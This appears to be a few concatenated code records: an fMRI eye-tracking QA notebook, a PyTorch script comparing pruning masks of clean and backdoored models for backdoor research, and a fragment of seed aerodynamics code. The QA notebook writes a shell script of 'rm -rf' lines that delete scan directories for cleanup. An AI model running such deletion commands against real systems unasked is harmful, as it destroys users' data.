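    return np.concatenate([[0.0], deltas.sum(axis=1)])  # FD of the first volume is 0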
\n# ***\n# ## 4. Check the Integrity of Eye Tracker Data Files & See if FD is low\n#\n# Unfortunately, not all eye tracking data files can be loaded properly.\n#\n# During this initial QA, we will test whether a given ET file (e.g., that of one run) can be properly loaded\n#\n# In addition we will also store the previously computed Mean and Max Framewise Displacement\n\n# +\n# %%time\n# Create empty DataFrame with the following columns:\n# * Sbj = Subject ID\n# * Run = Run ID\n# * Dir Avail = Does the directory for this run exist on our system?\n# * Mot Avail = Is the motion file for this run available on our system?\n# * ET Avail = Are both ET files for this run available on our system?\n# * ET_OK = Are we able to load (e.g., file is uncorrupted) the main ET File\ndf = pd.DataFrame(columns=['Sbj','Run','Dir Avail','Mot Avail','ET Avail', 'ET_OK'])\n\n# For all subjects\nfor s,sbj in enumerate(sbjs):\n # For all possible runs\n for run in RUNS:\n # Create the path to this run directory (should it exist)\n drun_path = osp.join(DATA_DIR,str(sbj),run)\n if osp.exists(drun_path):\n # Create the path to the motion file (should it exist)\n mot_path = osp.join(drun_path,'{run}_Movement_Regressors.txt'.format(run=run))\n # Create the paths to the ET files\n et_asc_path = osp.join(drun_path,'{run}_eyetrack.asc'.format(run=run))\n et_csv_path = osp.join(drun_path,'{run}_eyetrack_summary.csv'.format(run=run))\n # Try loading the ET file without causing any type of exception\n et_ok = False # default, so the flag is defined even when the ET file is missing\n if osp.exists(et_asc_path):\n try:\n dfTrial,dfMsg,dfFix,dfSacc,dfBlink,dfSamples = ParseEyeLinkAsc(et_asc_path)\n et_ok = True\n except Exception: # If there was any issue (e.g., an exception), then set et_ok to False\n et_ok = False\n # Update the dataframe with the information about this run\n df = df.append({'Sbj':sbj,\n 'Run':run,\n 'Dir Avail':osp.exists(drun_path),\n 'Mot Avail':osp.exists(mot_path),\n 'ET Avail':osp.exists(et_asc_path ) & osp.exists(et_csv_path),\n 'ET_OK': et_ok}, \n ignore_index=True)\n if VERBOSE:\n print('INFO: Just finished with subject {sbj} run {run}'.format(sbj=sbj, run=run))\n else: \n print('WARNING: Subject {sbj} run {run} does not exist'.format(sbj=sbj, run=run))\ndf = df.infer_objects()\n# -\n
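Row-wise `df.append` (used above) was deprecated in pandas 1.4 and removed in 2.0. A sketch of the equivalent list-of-dicts pattern, which also avoids the quadratic cost of repeated appends; the subject and run names are illustrative placeholders, and `check_run` stands in for the per-run checks in the loop above:

import pandas as pd

def check_run(sbj, run):
    # Stand-in for the per-run booleans computed in the loop above.
    return {'Sbj': sbj, 'Run': run, 'Dir Avail': True,
            'Mot Avail': True, 'ET Avail': True, 'ET_OK': False}

rows = [check_run(sbj, run)
        for sbj in ['100610', '102311']          # example subject IDs
        for run in ['rfMRI_REST1_PA']]           # example run name
df = pd.DataFrame(rows).infer_objects()          # one construction at the end
print(df)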
\n# ***\n# ## 5. Check the spatial resolution and length of the scans\n\nrun_list = [str(row['Sbj'])+'_'+row['Run'] for r,row in df.iterrows() ]\n\n# %%time\ndf['Spatial Resolution OK'] = None\ndf['Nacq OK'] = None\ndf['TR OK'] = None\nprint('++ INFO: Number of items to iterate over [%d]' % len(run_list))\nprint(' + ',end='')\nfor i,item in enumerate(run_list):\n sbj,run = item.split('_',1)\n file_path = osp.join(DATA_DIR,sbj,run,run+'_mPP.nii.gz')\n if np.mod(i,50)==0:\n print('%i..' % i, end='')\n if not osp.exists(file_path):\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Spatial Resolution OK')] = False\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Nacq OK')] = False\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'TR OK')] = False\n else:\n file_img = nib.load(file_path)\n [dx, dy, dz, tr] = file_img.header.get_zooms()\n \n if np.isclose(dx,1.60) & np.isclose(dy,1.60) & np.isclose(dz,1.60):\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Spatial Resolution OK')] = True\n else:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Spatial Resolution OK')] = False\n \n if np.isclose(tr,1.0):\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'TR OK')] = True\n else:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'TR OK')] = False\n \n if file_img.shape[3] == 900:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Nacq OK')] = True\n else:\n df.loc[((df['Sbj']==sbj) & (df['Run']==run),'Nacq OK')] = False\nprint('')\ndf.head()\n\nprint(\"++ INFO: Number of Runs with directory available: %d\" % df[df['Dir Avail']==True].shape[0])\nprint(\"++ INFO: Number of Runs with ET available: %d\" % df[df['ET Avail']==True].shape[0])\nprint(\"++ INFO: Number of Runs with ET OK: %d\" % df[df['ET_OK']==True].shape[0])\nprint(\"++ INFO: Number of Runs with correct spatial resolution: %d\" % df[df['Spatial Resolution OK']==True].shape[0])\nprint(\"++ INFO: Number of Runs with correct number of acquisitions: %d\" % df[df['Nacq OK']==True].shape[0])\nprint(\"++ INFO: Number of Runs with expected TR: %d\" % df[df['TR OK']==True].shape[0])\nprint(\"++ ===============================================================\")\nprint(\"++ INFO: Number of Runs with all controls OK: %d\" % df[(df['Dir Avail']==True) & \n (df['ET Avail']==True) & \n (df['ET_OK']==True) & \n (df['Spatial Resolution OK']==True) &\n (df['Nacq OK']==True) &\n (df['TR OK']==True)].shape[0])\n\n# ***\n# ## Save the summary of this first QA part to disk\n\ndf.to_pickle(QA1_Results_DF_Path)\n\nprint('++ INFO: Number of runs missing ET files = %d RUNS' % (df[df['ET Avail']==False].shape[0]))\nprint('++ INFO: Number of runs with ET files available but unreadable = %d RUNS' % (df[df['ET_OK']==False].shape[0]))\n\n# ***\n#\n# ### Clean up space\n#\n# Scans that will not be used because the ET is not available will be removed from disk\n\ndf = pd.read_pickle(QA1_Results_DF_Path)\n\ndf = df[df['ET Avail']==False]\n\ncommand_file = open('./N01_QA_RemoveScansWithBadET.sh','w+')\nfor r,row in df.iterrows():\n command_file.write('rm -rf /data/SFIMJGC_HCP7T/HCP7T/{sbj}/{run} \\n'.format(sbj=row['Sbj'],run=row['Run']))\ncommand_file.close()\n", "repo_name": "nimh-sfim/hcp7t_fv_sleep", "sub_path": "Notebooks/N01_QA.py", "file_name": "N01_QA.py", "file_ext": "py", "file_size_in_byte": 8746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_pickle", "line_number": 45, "usage_type": "call"}, {"api_name": "utils.variables.ProjectFiles_DF_Path", "line_number": 45, "usage_type": "argument"}, {"api_name": "utils.basics.get_7t_subjects", "line_number": 55, "usage_type": "call"}, {"api_name": "utils.basics.load_motion_info", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.variables.RUNS", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.variables.DATA_DIR", "line_number": 94, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 94, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "name"}, {"api_name": "utils.ParseEyeLinkAsc.ParseEyeLinkAsc", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "utils.variables.DATA_DIR", "line_number": 136, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 136, "usage_type": "name"}, {"api_name": "numpy.mod", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "name"}, {"api_name": "nibabel.load", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 152, "usage_type": "call"}, {"api_name": "utils.variables.QA1_Results_DF_Path", "line_number": 181, "usage_type": "argument"}, {"api_name": "pandas.read_pickle", "line_number": 192, "usage_type": "call"}, {"api_name": "utils.variables.QA1_Results_DF_Path", "line_number": 192, "usage_type": "argument"}]}
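The spatial-resolution/TR/volume checks in the notebook above reduce to one small helper. A sketch using nibabel, with the expected 1.6 mm isotropic voxels, 1 s TR, and 900 volumes taken from the notebook; the default tolerances of np.isclose are an assumption:

import nibabel as nib
import numpy as np

def check_scan_header(path, vox_mm=1.6, tr_s=1.0, n_vols=900):
    """Return a dict of booleans mirroring the notebook's three QA columns."""
    img = nib.load(path)
    dx, dy, dz, tr = img.header.get_zooms()  # 4D NIfTI: three voxel sizes plus TR
    return {
        'Spatial Resolution OK': bool(np.isclose(dx, vox_mm) and
                                      np.isclose(dy, vox_mm) and
                                      np.isclose(dz, vox_mm)),
        'TR OK': bool(np.isclose(tr, tr_s)),
        'Nacq OK': img.shape[3] == n_vols,
    }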
{"seq_id": "14677063857", "text": "import argparse\nimport numpy as np\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nimport cv2\nimport PIL.Image\n\n# from models import *\nimport models\n\n# Prune settings\nparser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune')\nparser.add_argument('--dataset', type=str, default='cifar10',\n help='training dataset (default: cifar10)')\nparser.add_argument('--val-batch-size', type=int, default=256, metavar='N',\n help='input batch size for validation (default: 256)')\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\nparser.add_argument('--depth', type=int, default=16,\n help='depth of the vgg')\nparser.add_argument('--arch', default='vgg_16', type=str,\n help='architecture to use')\n# parser.add_argument('--model', default='', type=str, metavar='PATH',\n# help='path to the model (default: none)')\nparser.add_argument('--save', default='./cleanresult/1/EB-30-29.pth.tar', type=str, metavar='PATH',\n help='path to save pruned model (default: none)')\nparser.add_argument('--save_1', default='./poisonresult_2/2/EB-30-28.pth.tar', type=str, metavar='PATH',\n help='path to save pruned model (default: none)')\n
\n# parser.add_argument('--save_2', default='./poisonresult_2/3/EB-30-27.pth.tar', type=str, metavar='PATH',\n# help='path to save pruned model (default: none)')\n# parser.add_argument('--start_epoch', default=0, type=int, metavar='N', help='manual start epoch number')\n# parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number')\n\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')\nprint('Experiment Starting... Check critical information below carefully!')\nprint('Training Phase: Calculate Difference of Two Masks;')\nprint('Dataset:{};'.format(args.dataset))\n# print('Dataset:{};\\tStart Epoch:{};\\tEnd Epoch:{};'.format(args.dataset, args.start_epoch, args.end_epoch)) #\nprint('Network Architecture:{};\\tDepth:{};'.format(args.arch, args.depth)) #\nprint('First Mask Path:{};'.format(args.save))\nprint('Second Mask Path:{};'.format(args.save_1))\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')\n\nsetting_perc = 0.3\n\nif not os.path.exists(args.save):\n os.makedirs(args.save)\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nmodel = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth)\nmodel_bd = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth)\n\nif args.cuda:\n model.cuda()\n model_bd.cuda()\n\n\ndef pruning(model, percent):\n total = 0\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n total += m.weight.data.shape[0]\n\n bn = torch.zeros(total)\n index = 0\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n size = m.weight.data.shape[0]\n bn[index:(index + size)] = m.weight.data.abs().clone()\n index += size\n\n y, i = torch.sort(bn)\n thre_index = int(total * percent)\n thre = y[thre_index]\n mask2 = bn.gt(thre).float().view(-1)\n return mask2\n\n\ndef get_mask(path: str, default_percent=0.3):\n print(f'==> Mask from {path} ... ')\n checkpoint = torch.load(path)\n best_epoch = checkpoint['epoch']\n print('EarlyBird Emerging Epoch: ', best_epoch)\n model.load_state_dict(checkpoint['state_dict'])\n percent = 0.3 if 'EB-30' in path else 0.5 if 'EB-50' in path else 0.7 if 'EB-70' in path else default_percent\n mask = pruning(model, percent)\n print('Remanent Percent: {}%.\\n'.format(int(torch.sum(mask == 1) * 100. / mask.size(0))))\n return mask\n\n# get clean EB\nprint('==> resuming from {} ... '.format(args.save))\ncheckpoint = torch.load(args.save)\nbest_epoch = checkpoint['epoch']\nprint('EarlyBird Emerging Epoch: ', best_epoch)\nmodel.load_state_dict(checkpoint['state_dict'])\n\n# get backdoor EB and mask\nprint('==> resuming from {} ... '.format(args.save_1))\ncheckpoint_bd = torch.load(args.save_1)\nbest_epoch_bd = checkpoint_bd['epoch']\nprint('EarlyBird Emerging Epoch: ', best_epoch_bd)\nmodel_bd.load_state_dict(checkpoint_bd['state_dict'])\npercent_2 = 0.3 if 'EB-30' in args.save_1 else 0.5 if 'EB-50' in args.save_1 else 0.7 if 'EB-70' in args.save_1 else setting_perc\nbest_mask_bd = pruning(model_bd, percent_2)\n\nX = []\nY = []\n\nfor percent_set in np.arange(0.3, 1, 0.05): # 0.3, 0.35, ..., 0.95 (np.arange excludes the stop value)\n X.append(percent_set)\n print(\"\\nclean prune percent:\", percent_set)\n best_mask = pruning(model, percent_set) # get clean mask /key neurons\n\n in_num = 0\n for i in range(best_mask.size(0)):\n if best_mask[i] == 1 and best_mask_bd[i] == 1: # key neuron exists in both cl & bd\n in_num += 1 \n Y.append(in_num / int(torch.sum(best_mask)))\n print(\"both exist percent:\", in_num / int(torch.sum(best_mask)))\nprint(X)\nprint(Y)", "repo_name": "zeyuanyin/LTH-Backdoor", "sub_path": "plot/key_neuron_rate.py", "file_name": "key_neuron_rate.py", "file_ext": "py", "file_size_in_byte": 5281, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.__dict__", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.__dict__", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.sort", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 130, "usage_type": "call"}]}
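The script's core measurement is the overlap between two BatchNorm-gamma masks. A condensed, self-contained sketch of that computation on random stand-in data; the vectorized overlap replaces the Python loop above, and the sizes/percentages are illustrative:

import torch

def bn_mask(gammas: torch.Tensor, percent: float) -> torch.Tensor:
    # Keep channels whose |gamma| is above the `percent` quantile, as in pruning() above.
    thre = gammas.abs().sort().values[int(gammas.numel() * percent)]
    return (gammas.abs() > thre).float()

gammas_clean = torch.rand(512)  # stand-in for the concatenated BN scale factors
gammas_bd = torch.rand(512)

m_clean = bn_mask(gammas_clean, 0.5)
m_bd = bn_mask(gammas_bd, 0.5)

# Fraction of the clean mask's surviving channels that also survive in the backdoor mask.
overlap = (m_clean * m_bd).sum() / m_clean.sum()
print(f"both exist percent: {overlap.item():.3f}")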
wing_pitch):\n self.wing_pitch = wing_pitch\n\n def set_wing_chord(self, wing_chord):\n self.wing_chord = wing_chord\n\n def compute_force_all_elements(self):\n self.list_crrt_R = []\n self.list_projected_vertical_velocity = []\n self.list_AOA_deg = []\n self.list_total_velocity = []\n self.list_wind_angle_rad = []\n self.list_drag = []\n self.list_lift = []\n self.list_Cd = []\n self.list_Cl = []\n self.list_forward_force = []\n self.list_vertical_force = []\n self.list_forward_force_lift = []\n self.list_forward_force_drag = []\n self.list_vertical_force_lift = []\n self.list_vertical_force_drag = []\n self.list_base_coeff = []\n self.list_crrt_rotation_velocity = []\n self.list_forward_moments = []\n\n for (crrt_size, crrt_R, crrt_phi) in zip(self.wing_instance.list_size_element, self.wing_instance.list_R, self.wing_instance.list_phi):\n # horizontal velocity due to rotation of the seed\n crrt_rotation_velocity = self.angular_rate * crrt_R\n\n # angle of attack\n projected_vertical_velocity = self.vertical_velocity * np.cos(crrt_phi * np.pi / 180.0)\n wind_angle_rad = np.arctan2(projected_vertical_velocity, crrt_rotation_velocity)\n crrt_AOA_deg = wind_angle_rad * 180.0 / np.pi - self.wing_pitch\n\n # total velocity magnitude\n total_velocity = np.sqrt(crrt_rotation_velocity**2 + projected_vertical_velocity**2)\n\n # base coefficient for computation of lift and drag\n base_coeff = 0.5 * self.rho * (total_velocity**2) * self.wing_chord * crrt_size\n\n # compute lift and drag; careful about the orientation of crrt_AOA_deg! This is because of\n # direction of rotation vs. the sketches\n Cd = self.interpolator_Cd.return_interpolated(crrt_AOA_deg + self.added_AOA_camber_deg)\n Cl = self.interpolator_Cl.return_interpolated(crrt_AOA_deg + self.added_AOA_camber_deg)\n crrt_lift = base_coeff * Cl\n crrt_drag = base_coeff * Cd\n crrt_forward = np.sin(wind_angle_rad) * crrt_lift \\\n - np.cos(wind_angle_rad) * crrt_drag\n crrt_vertical = np.cos(wind_angle_rad) * crrt_lift \\\n + np.sin(wind_angle_rad) * crrt_drag\n\n crrt_forward_projected = crrt_forward\n crrt_vertical_projected = crrt_vertical * np.cos(crrt_phi * np.pi / 180.0)\n\n self.list_crrt_R.append(crrt_R)\n self.list_projected_vertical_velocity.append(projected_vertical_velocity)\n self.list_crrt_rotation_velocity.append(crrt_rotation_velocity)\n self.list_wind_angle_rad.append(wind_angle_rad)\n self.list_total_velocity.append(total_velocity)\n self.list_AOA_deg.append(crrt_AOA_deg)\n self.list_base_coeff.append(base_coeff)\n self.list_drag.append(crrt_drag)\n self.list_lift.append(crrt_lift)\n self.list_Cd.append(Cd)\n self.list_Cl.append(Cl)\n self.list_forward_force.append(crrt_forward_projected)\n self.list_vertical_force.append(crrt_vertical_projected)\n self.list_forward_moments.append(crrt_forward_projected * crrt_R)\n\n def compute_resultant_force(self):\n self.resultant_forward_moment = sum(self.list_forward_moments)\n self.resultant_vertical_force = sum(self.list_vertical_force)\n\n def display_reduced_information(self, title_base=None, gray_region=None):\n linewidth = 3.0\n color = (0.5, 0.5, 0.5, 0.5)\n \n \n \n # figure with profile and angle of attack ------------------------------\n fig, ax1 = plt.subplots()\n \n if gray_region is not None:\n rect = Rectangle((gray_region[0], -0.002), gray_region[1] - gray_region[0], 0.06, color=color)\n ax1.add_patch(rect)\n \n ax1.plot(self.wing_instance.list_R, self.wing_instance.list_h, 'b', linewidth=linewidth * 2.0, label=\"seed wing\", linestyle=\"-\")\n ax1.set_xlabel('R [m]')\n # 
Make the y-axis label, ticks and tick labels match the line color.\n ax1.set_ylabel('h [m]', color='b')\n ax1.tick_params('y', colors='b')\n plt.ylim([-0.002, 0.052])\n plt.xlim([-0.002, 0.052])\n\n ax2 = ax1.twinx()\n ax2.plot(self.wing_instance.list_R, self.list_AOA_deg, 'r', linewidth=linewidth, linestyle=\"--\", label=\"Angle of attack\")\n ax2.set_ylabel('local angle of attack [deg]', color='r')\n ax2.tick_params('y', colors='r')\n \n ax2.plot([], [], 'b', linewidth=linewidth, linestyle=\"-\", label=\"seed wing\")\n \n plt.legend(loc=\"lower right\")\n\n fig.tight_layout()\n \n plt.savefig(title_base + \"combined_fig_1.pdf\")\n # done -----------------------------------------------------------------\n \n \n \n # figure with vertical force and moment --------------------------------\n fig, ax1 = plt.subplots()\n \n if gray_region is not None:\n rect = Rectangle((gray_region[0], -0.5), gray_region[1] - gray_region[0], 1.0, color=color)\n ax1.add_patch(rect)\n \n ax1.plot(self.wing_instance.list_R, np.array(self.list_vertical_force) / np.array(self.wing_instance.list_size_element), 'b', linewidth=linewidth, linestyle=\"-\", label=\"vertical force\")\n ax1.plot([0.0, 0.049], [0.0, 0.0], 'k', linewidth=linewidth * 0.75)\n ax1.set_xlabel('R [m]')\n # Make the y-axis label, ticks and tick labels match the line color.\n ax1.set_ylabel('Vertical force distribution [N/m]', color='b')\n ax1.tick_params('y', colors='b')\n plt.ylim([-0.3, 0.3])\n plt.xlim([0.00, 0.049])\n\n ax2 = ax1.twinx()\n ax2.plot(self.wing_instance.list_R, np.array(self.list_forward_moments) / np.array(self.wing_instance.list_size_element), 'r', linewidth=linewidth, linestyle=\"--\", label=\"forward moment\")\n ax2.set_ylabel('Forward moment distribution [N.m / m]', color='r')\n ax2.tick_params('y', colors='r')\n plt.ylim([-0.0044, 0.0045])\n \n ax2.plot([], [], 'b', linewidth=linewidth, linestyle=\"-\", label=\"vertical force\")\n \n plt.legend(loc=\"lower left\")\n\n fig.tight_layout()\n \n plt.savefig(title_base + \"combined_fig_2.pdf\")\n # done -----------------------------------------------------------------\n \n \n \n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, np.array(self.list_vertical_force) / np.array(self.wing_instance.list_size_element), linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"Vertical force distribution [N/m]\")\n plt.ylim([-0.3, 0.4])\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_forceDistribution.pdf\")\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, np.array(self.list_forward_force) / np.array(self.wing_instance.list_size_element), linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.ylim([-0.2, 0.1])\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"Forward force distribution [N/m]\")\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_forwardForceDistribution.pdf\")\n plt.show()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, 
np.array(self.list_forward_moments) / np.array(self.wing_instance.list_size_element), linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"Forward moment distribution [N.m / m]\")\n plt.ylim([-0.008, 0.004])\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_momentDistribution.pdf\")\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if gray_region is not None:\n rect = Rectangle((gray_region[0], -100), gray_region[1] - gray_region[0], 200, color=color)\n ax.add_patch(rect)\n plt.plot(self.wing_instance.list_R, self.list_AOA_deg, linewidth=linewidth)\n # plt.legend()\n plt.grid()\n plt.xlabel(\"R [m]\")\n plt.ylabel(\"local angle of attack [deg]\")\n plt.ylim([-20, 50])\n plt.tight_layout()\n if title_base is not None:\n plt.savefig(title_base + \"_AOADistribution.pdf\")\n \n \n \n \n \n plt.show()\n\n def return_forward_moment(self):\n return(self.resultant_forward_moment)\n\n def return_vertical_force(self):\n return(self.resultant_vertical_force)\n\n def display_all_results(self):\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_AOA_deg, label=\"AOA\") # list_AOA_deg is already in degrees\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_wind_angle_rad) * 180.0 / np.pi, label=\"wind angle\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_total_velocity, label=\"total_velocity\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_crrt_rotation_velocity, label=\"crrt_rotation_velocity\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_Cl, label=\"Cl\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_Cd, label=\"Cd\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_base_coeff, label=\"base_coeff\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_lift, label=\"lift\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_drag, label=\"drag\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_lift) / np.array(self.list_drag), label=\"lift/drag\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, self.list_forward_force_lift, label=\"forward lift\")\n plt.plot(self.wing_instance.list_R, self.list_forward_force_drag, label=\"forward drag\")\n plt.plot(self.wing_instance.list_R, self.list_vertical_force_lift, label=\"vertical lift\")\n plt.plot(self.wing_instance.list_R, self.list_vertical_force_drag, label=\"vertical drag\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_vertical_force) / np.array(self.wing_instance.list_size_element), label=\"Vertical force\")\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(self.wing_instance.list_R, np.array(self.list_forward_force) / np.array(self.wing_instance.list_size_element), label=\"Forward force\")\n plt.legend()\n plt.show()\n\n\n\"\"\"\nnote that in compute_force_on_seed, both the rotation and the vertical velocity are positive for 'normal seed'. 
I.e.\npositive vertical velocity means seed going down, positive frequency means seed rotating as in experiments.\n\"\"\"\n", "repo_name": "jerabaul29/EffectFoldAngleAutorotatingSeeds", "sub_path": "model/compute_force_on_seed.py", "file_name": "compute_force_on_seed.py", "file_ext": "py", "file_size_in_byte": 13161, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.pi", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 87, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, 